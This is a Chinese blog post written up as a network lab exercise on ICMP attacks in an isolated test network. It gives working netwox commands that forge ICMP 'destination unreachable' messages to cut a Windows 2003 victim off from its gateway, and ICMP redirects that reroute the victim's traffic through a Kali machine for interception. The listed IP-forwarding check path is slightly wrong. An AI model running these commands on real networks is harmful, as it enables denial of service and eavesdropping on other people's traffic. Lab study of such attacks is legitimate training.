HCIE(2)——ICMP攻击模拟

最新推荐文章于 2023-11-13 13:58:16 发布
最新推荐文章于 2023-11-13 13:58:16 发布
阅读量317 收藏 3
点赞数
分类专栏: 网络实验
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45782298/article/details/109227966
版权

一、实验拓扑
在这里插入图片描述
二、拓扑介绍
局域网:172.24.8.0
攻击者kali:172.24.8.129
受害者win2003:172.24.8.253
PC2:172.24.8.254
外网主机:10.1.1.100

三、实验步骤
1)首先测试设备之间的连通性(win2003为例)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
2)ICMP不可达,实现win2003主机访问外网的时候都出现目标主机不可达的情况
即只需要做到win2003在访问172.24.8.2网关时出现主机不可达即可。
使用netwox 82号工具来实现(可以同时开几个终端来增强效果):

sudo netwox 82 -f "host 172.24.8.253"  -i "172.24.8.2"
-f:进行筛选
-i:目标地址

查看效果:
在这里插入图片描述
可以明显看到其中间断的出现了一些目标不可达的报文,说名实验成功。

3)ICMP重定向,实现当win2003访问外网时,需要先将报文交给攻击者kali后,再由kali转发到网关,最后再到外网主机。
实现这一目标,只需将将win2003的默认网关设为攻击者kali的主机地址即可,同时需要在kali上开启路由转发功能。
①开启路由转发功能

vim   /etc/sysctl.conf            //编辑sysctl.conf
	net.ipv4.ip_forward = 1     //设置为1
sysctl  -p /etc/sysctl.conf      //立即生效不需要重启
cat  /etc/sys/net/ipv4/ipv4_forward      //查看值是否为1,为1表示修改完成,为0表示没有修改

②使用netwox的86号工具来实现

sudo netwox 86 -f "host 172.24.8.253" -g "172.24.8.129"  -i "172.24.8.2"
-f:路由筛选
-g:新指定的网关地址
-i:原来的网关地址

在攻击者kali上面进行抓包,可以抓到ICMP重定向的包和要传输的数据包,也就是说,可以在kali上面获取从win2003发往外网的数据包。
在这里插入图片描述

实验成功!!!

come better
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CAPL如何仿真ICMP报文
测试领域技术分享
12-17 966
随着智能电动汽车的普及,车载以太网的应用逐渐普及,所以在汽车电子台架测试过程中,免不了仿真模拟发送以太网报文,本文就介绍两种方法模拟仿真发送以太网ICMP报文。
网络协议与攻击模拟-05-ICMP协议
YueXuan_521的博客
05-05 840
网络协议与攻击模拟-05-ICMP协议
ICMP Flood攻击
Turk的专栏
07-01 5437
1 原理 ICMP Flood 的攻击原理和ACK Flood原理类似,属于流量型的攻击方式,也是利用大的流量给服务器带来较大的负载,影响服务器的正常服务。由于目前很多防火墙直接过滤ICMP报文, 因此ICMP Flood出现的频度较低。比较下面两幅图,就应该可以看出是否有ICMP Flood攻击。 正常ICMP包:  图 大包攻击的时候: 
模拟ICMP过程
lycommand的专栏
12-18 831
首先建立common头文件 ////////////////////////////////////////////////// // comm.h文件 // 包含一些公共函数 #ifndef __COMM_H__ #define __COMM_H__ // 校验和的计算 // 以16位的字为单位将缓冲区的内容相加,如果缓冲区长度为奇数, // 则再加上一个字节。它们的和存入一个32位的双
网测科技_ICMPV4单包攻击测试案例
最新发布
Netitest的博客
11-13 157
介绍ICMPV4单包攻击测试案例
hcie——rs复习
12-09
想要学习HCIE的可以学习,本资料是HCIE的全部资料,包括HCNA到HCIE的全部知识点
HCIE-RS_中文模拟题.docx
12-24
HCIE-RS_中文模拟
HCIE面试题——LAN&WAN 技术.docx
12-18
HCIE 面试题——LAN&WAN 技术 HCIE 面试题——LAN&WAN 技术是一份关于 LAN&WAN 技术的面试题,涵盖了交换机端口类型、VLAN 帧的识别、数据帧的处理方式等多个方面的知识点。 交换机端口类型 交换机端口类型有四种...
HCIE模拟
12-08
"HCIE模拟题"这个标题表明这是一个针对HCIE认证考试的模拟试题集,可能包含了多个方面的网络技术和理论知识,帮助考生熟悉考试格式和内容。 【HCIE-R&S详解】 "R&S"代表Routing & Switching,即路由与交换,这是...
HCIE-RS3.0-LAB2-C2.zip
09-14
通过模拟真实的工作场景,HCIE-LAB2旨在测试候选人在高压环境下解决问题的能力。 总之,【HCIE-RS3.0-LAB2-C2.zip】文件是为HCIE-R&S第三版实验室考试第二部分提供的重要参考资料,它包含的预配文件和拓扑信息是...
实验 Attacks on TCP/IP Protocols
weixin_30399821的博客
06-05 399
------- 转载请注明出处,博客园-lasgalen-http://www.cnblogs.com/lasgalen/p/4555648.html ------- 1 实验目的 进行这个实验的目的是获得TCP/IP协议缺陷和基于这些缺陷的攻击的经验。在TCP/IP协议上的缺陷是一种在协议设计和实现出现的漏洞。这给我们上了很宝贵的一课,关于为什么安全应当在一开始的时候就被考虑设计...
盘点一款黑客必备的强大网络工具集——netwox
pyjishu的博客
04-09 6921
今天给大家分享一个网络工具netwox。 前言 netwox 是由 lauconstantin 开发的一款网络工具集,适用群体为网络管理员和网络黑客,它可以创造任意的 TCP、UDP 和 IP 数据报文,以实现网络欺骗,并且可以在 Linux 和 Windows 系统中运行。 可以说,对平时我们用来测试网络的性能和网站压力测试很有帮助了。它不仅仅只是一个工具包,而是很多个工具集的集中体现,所以,有了它,基本你可以少下载很多软件了。 具体用法 下面就来具体说说它的用法: 首先我们现在netw.
网络协议与攻击模拟
YangYubo091699的博客
05-07 3164
协议 TCP/IP协议簇 网络接口层(没有特定的协议) 物理层 (PPPOE-宽带拨号) 数据链路层 网络层:IP(v4/v6)、ARP(地址解析协议)、RARP、ICMP(internet控制报文协议)、IGMP 传输层:TCP(传输控制协议) UDP(用户数据包协议) 应用层:都是基于传输层协议的端口,总共端口0-65536 固定协议的端口号0-1023 DHCP DNS HTTP 80 HTTPS 443 FTP SMTP POP3 IMAP 流量抓取工具(wireshark
ICMP攻击实战及其简略防御方法
爱吃仡坨的Blog
08-07 5499
ICMP攻击实战及其简略防御方法
ICMP重定向攻击实验:
文武老司机的博客
12-16 3069
ICMP重定向攻击实验: 0x01 攻击目的: ​ 使用攻击机对本网段内靶机进行ICMP重定向攻击。目的是诱使靶机认为攻击机是网关,将所有流量交给攻击机转发。攻击机即可实现中间人身份。 0x02 环境介绍: ​ 攻击机:Kali linux ​ 靶机:ubuntu 20.04 ​ 存在形式:vmware之虚机 ​ 联网方式:NAT ​ IP地址: ​ Gateway:192.168.8.2/24 ​ Kali linux:192.168.8.128/24 ​
如何使用python3模拟icmp发包
du159539的博客
05-26 3315
如何使用python3模拟icmp发包模拟icmp协议快速探测内网机器ICMP 包原理简单的创建icmp包信息创建raw socket 发送数据包接收数据包,以及解包完整的一次发包以及解析如何获取ttl值模拟icmp批量探测内网存活机器 模拟icmp协议快速探测内网机器 如果给定一个b段,如何快速检测出网段中的存活机器,我们肯定会想到ping命令,但有些机器可能开启防火墙策略,但是一个网段内,网关一般是可以被ping通的,所以icmp协议针对探测存活网段,缩小目标很重要。本文章主要讲解如何使用python3
简单的icmp攻击
malixxx
08-19 813
由于本人很菜,这个代码是改别人的.呵呵.可以在公司的局域网里搞搞坏,呵呵. 我是在ubuntu8.04下的,需要gcc编译. 修改了一些,加添了广播,可发给255,我感觉会把局域网弄乱的 呵呵. #include #include #include #include #include #include #include unsigned short c...
ICMP 重定向攻击ICMP不可达报文攻击
tigerOrtiger的博客
03-30 7367
ICMP 重定向攻击ICMP不可达报文攻击 00X1 写在前面 最近一直在研究各种畸形报文和一些特殊的报文,并且需要根据这些攻击特点进行相应的数据包侦测与拦截。一切其他的攻击以后有时间再来写吧。当我研究到了ICMP重定向和不可达报文攻击的时候,觉得很有趣,ICMP协议在我们网络中经常存在于ping 中,用于测试两台主机之间的网络连通性,以前也听说过这两种形态的攻击,但是没有怎么去理解这些攻击流...
ICMP flood攻击
热门推荐
YellowTail
03-31 1万+
icmp flood属于flood的其中一种. 达到效果有以下实现方法 1.两败俱伤 此处转载自http://hi.baidu.com/1tata/item/7bcfcd2e330d490c72863e8e 大量的 ICMP消息发送给目标系统,使得它不能够对合法的服务请求做出响应。中美黑客大战中的多数中国黑客采用的正是此项技术。ICMP FLOOD攻击实际上是一种两败俱伤的攻击方式,在主

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值